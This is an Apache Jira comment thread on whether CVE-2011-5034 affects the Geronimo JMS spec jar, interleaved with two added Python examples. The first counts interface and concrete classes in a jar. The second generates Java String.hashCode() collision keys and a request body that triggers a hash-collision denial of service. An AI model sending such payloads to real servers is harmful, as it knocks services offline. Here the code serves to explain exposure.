[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17388667#comment-17388667 ]

Romain Manni-Bucau commented on GERONIMO-6814:
----------------------------------------------

Implementations can have CVEs, but here you will need to show how, since the last releases don't have the linked CVE. Spec jars have almost no impl generally.

> Improve Geronimo specs to mitigate CVE-2011-5034
>
>
> Key: GERONIMO-6814
> URL: https://issues.apache.org/jira/browse/GERONIMO-6814
> Project: Geronimo
> Issue Type: Bug
> Security Level: public(Regular issues)
> Components: geronimo-maven-plugin
> Affects Versions: 1.1.1
> Reporter: Karthick
> Priority: Major
>
> Hi,
>
> By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » apache-karaf » 4.3.2 (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2]) packs jms_geronimo_1.1_spec 1.1.1 version which, when scanned through security tools like JFrog Xray and Anchore, reports CVE-2011-5034 ([NVD - CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034]). However, there seems to be no later version of geronimo where this CVE is fixed. It has been 10 years since this CVE was created and no fix seen yet. Do you have an analysis on whether this CVE really affects geronimo specs or any plan to provide a next version?
> There

--
This message was sent by Atlassian Jira
(v8.3.4#803005)
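The claim above that spec jars carry almost no implementation is something a reviewer can check directly rather than take on trust. The script below is an added example, not code from the Geronimo project or from this thread: it opens a jar, parses only the class-file header of each entry (magic, version, constant pool, access_flags) and counts interfaces, abstract classes and concrete classes, listing the concrete ones so they can be read against what the CVE actually describes. The in-memory sample jar it falls back to is constructed for the demonstration; the local path geronimo-jms_1.1_spec-1.1.1.jar in the usage note is an assumed download location.

```python
"""Classify the .class entries of a jar as interface / abstract / concrete.

Added example, not code from the Geronimo project or from the page. It reads
only the class-file header (magic, version, constant pool, access_flags), so it
works on any jar without a JVM. Run it against a local copy of a spec jar,
e.g. geronimo-jms_1.1_spec-1.1.1.jar (assumed path), to see how much
implementation code it actually carries.
"""
import io
import struct
import sys
import zipfile

ACC_INTERFACE = 0x0200
ACC_ABSTRACT = 0x0400

# Byte size of each fixed-size constant-pool entry body, keyed by tag
# (JVMS 4.4). Utf8 (tag 1) is variable-length; Long (5) and Double (6)
# additionally consume two pool slots.
_CP_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
             12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_kind(data: bytes) -> str:
    """Return 'interface', 'abstract' or 'concrete' for one class file."""
    buf = io.BytesIO(data)
    magic, _minor, _major, cp_count = struct.unpack(">IHHH", buf.read(10))
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    index = 1                      # pool is 1-based and holds cp_count - 1 entries
    while index < cp_count:
        tag = buf.read(1)[0]
        if tag == 1:               # CONSTANT_Utf8: u2 length, then the bytes
            (length,) = struct.unpack(">H", buf.read(2))
            buf.read(length)
        else:
            buf.read(_CP_FIXED[tag])
        index += 2 if tag in (5, 6) else 1
    (flags,) = struct.unpack(">H", buf.read(2))
    if flags & ACC_INTERFACE:
        return "interface"
    if flags & ACC_ABSTRACT:
        return "abstract"
    return "concrete"


def summarize_jar(jar_source):
    """jar_source: path or file-like object. Returns (counts, concrete class names)."""
    counts = {"interface": 0, "abstract": 0, "concrete": 0}
    concrete = []
    with zipfile.ZipFile(jar_source) as jar:
        for name in jar.namelist():
            if not name.endswith(".class") or name.endswith("module-info.class"):
                continue
            kind = class_kind(jar.read(name))
            counts[kind] += 1
            if kind == "concrete":
                concrete.append(name)
    return counts, concrete


def build_class(flags, this_name, super_name="java/lang/Object"):
    """Constructed minimal class file (no fields, methods or attributes) used as
    sample input. Pool: #1 Utf8 this_name, #2 Class #1, #3 Utf8 super_name,
    #4 Class #3, #5 Long (takes slots 5 and 6, exercising the two-slot rule)."""
    def utf8(text):
        raw = text.encode("utf-8")
        return b"\x01" + struct.pack(">H", len(raw)) + raw
    pool = (utf8(this_name) + b"\x07" + struct.pack(">H", 1)
            + utf8(super_name) + b"\x07" + struct.pack(">H", 3)
            + b"\x05" + struct.pack(">Q", 0))
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 49, 7)   # 6 slots used + 1
    # access_flags, this_class=#2, super_class=#4, then 0 interfaces/fields/methods/attributes
    return header + pool + struct.pack(">HHHHHHH", flags, 2, 4, 0, 0, 0, 0)


def sample_spec_jar():
    """Constructed in-memory jar shaped like an API artifact: two interfaces
    and one concrete exception class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("javax/jms/Connection.class", build_class(0x0601, "javax/jms/Connection"))
        jar.writestr("javax/jms/Session.class", build_class(0x0601, "javax/jms/Session"))
        jar.writestr("javax/jms/JMSException.class",
                     build_class(0x0021, "javax/jms/JMSException", "java/lang/Exception"))
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    source = sys.argv[1] if len(sys.argv) > 1 else sample_spec_jar()
    totals, impl = summarize_jar(source)
    print(totals)
    for entry in impl:
        print("concrete:", entry)
```

Run as `python class_kinds.py geronimo-jms_1.1_spec-1.1.1.jar` (file name assumed). A short list of concrete classes, typically exception types, is normal for an API jar; the useful output is that list, which you read looking for the request-parameter handling the CVE describes. Finding none is the evidence to attach to a scanner suppression, which is stronger than pointing at the groupId mismatch alone.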
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17388651#comment-17388651 ]

Karthick commented on GERONIMO-6814:

I can see that these Geronimo JMS and JTA specs expose the javax.transaction and javax.jms APIs. So, do you mean that this CVE on hash collision doesn't affect these Java APIs?
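The "hash collision" the question refers to is the mechanism behind CVE-2011-5034 as NVD describes it: a server computing hash values for request parameters without limiting predictable collisions, so a single request with many colliding parameter names consumes CPU. The following is an added example, not code from the page or from Geronimo, showing how cheaply such keys are produced under java.lang.String.hashCode() and what they do to a chained hash table. The hash table and the request body are constructed stand-ins for the server-side parameter map; the 2**n construction from the seed pair "Aa" and "BB" is the standard one.

```python
"""Generate keys that collide under java.lang.String.hashCode() and measure
what they do to a chained hash table.

Added example, not code from the page or from Geronimo. CVE-2011-5034 is a
hash-collision denial of service: many request parameters whose names share
one hash value turn the server's parameter map into a linked list, so each
insert costs O(n) and one request burns CPU quadratically. The exposed code
is whatever parses attacker-controlled keys into a map; an interface
declaration contains no such path.
"""


def java_string_hash(s: str) -> int:
    """String.hashCode(): h = 31*h + c per char, wrapped to a signed 32-bit int.
    Uses ord(), so it matches Java for BMP characters (assumption)."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - (1 << 32) if h & 0x80000000 else h


def colliding_keys(n_chunks: int, seeds=("Aa", "BB")) -> list:
    """All 2**n_chunks concatenations of the seeds share one hashCode.
    'Aa' and 'BB' both hash to 2112, and for chunks of equal length
    hash(a + b) == hash(a) * 31**len(b) + hash(b), so every mix collides."""
    keys = [""]
    for _ in range(n_chunks):
        keys = [k + s for k in keys for s in seeds]
    return keys


def insert_cost(keys, n_buckets=1 << 16) -> int:
    """Toy chained hash table, constructed to mirror a HashMap that keeps long
    chains as lists: insertion walks the whole bucket comparing keys. Returns
    the total number of key comparisons, i.e. the work the sender forces."""
    buckets = [[] for _ in range(n_buckets)]
    comparisons = 0
    for key in keys:
        chain = buckets[java_string_hash(key) & (n_buckets - 1)]
        comparisons += len(chain)   # one comparison per entry already in the chain
        chain.append(key)
    return comparisons


def query_string(keys) -> str:
    """Form body a client would send: every colliding key as a parameter name."""
    return "&".join(f"{key}=1" for key in keys)


if __name__ == "__main__":
    hostile = colliding_keys(10)                    # 1024 keys, one hash value
    benign = [f"param{i}" for i in range(len(hostile))]
    print("distinct hashes, hostile:", len({java_string_hash(k) for k in hostile}))
    print("comparisons, benign :", insert_cost(benign))
    print("comparisons, hostile:", insert_cost(hostile))
    print("body size (bytes)   :", len(query_string(hostile)))
```

With 1024 hostile keys the toy table performs 523,776 comparisons against a handful for the benign set, and the body that triggers it is about 23 KB; doubling the key count quadruples the work. Whether a given artifact is affected therefore turns on whether it contains code that builds a map from attacker-supplied keys, which is what the spec-versus-server distinction in this thread is about.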
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387945#comment-17387945 ]

Romain Manni-Bucau commented on GERONIMO-6814:
----------------------------------------------

Specs are the Java EE API. But this issue also affects MicroProfile artifacts, which are unrelated to these CVEs. Most CVEs are on the deprecated server and irrelevant; we ensure there are none on maintained artifacts.
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387903#comment-17387903 ]

Karthick commented on GERONIMO-6814:

Hi, I am unable to find what 'spec' means. Not in Maven ([Maven Repository: org.apache.geronimo.specs » geronimo-jms_1.1_spec » 1.1.1 (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.geronimo.specs/geronimo-jms_1.1_spec/1.1.1]) and not in GitHub ([apache/geronimo-specs: Mirror of Apache Geronimo specs (github.com)|https://github.com/apache/geronimo-specs]). Could you provide a differentiating factor between which artifacts you mean as runtime/server and what the definition of 'specs' is?
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387848#comment-17387848 ]

Romain Manni-Bucau commented on GERONIMO-6814:
----------------------------------------------

Hi, AFAIK these vulnerabilities are related to the server and not the spec jar, but CVE scanners mix them up due to the groupId, so it looks like a false positive to me.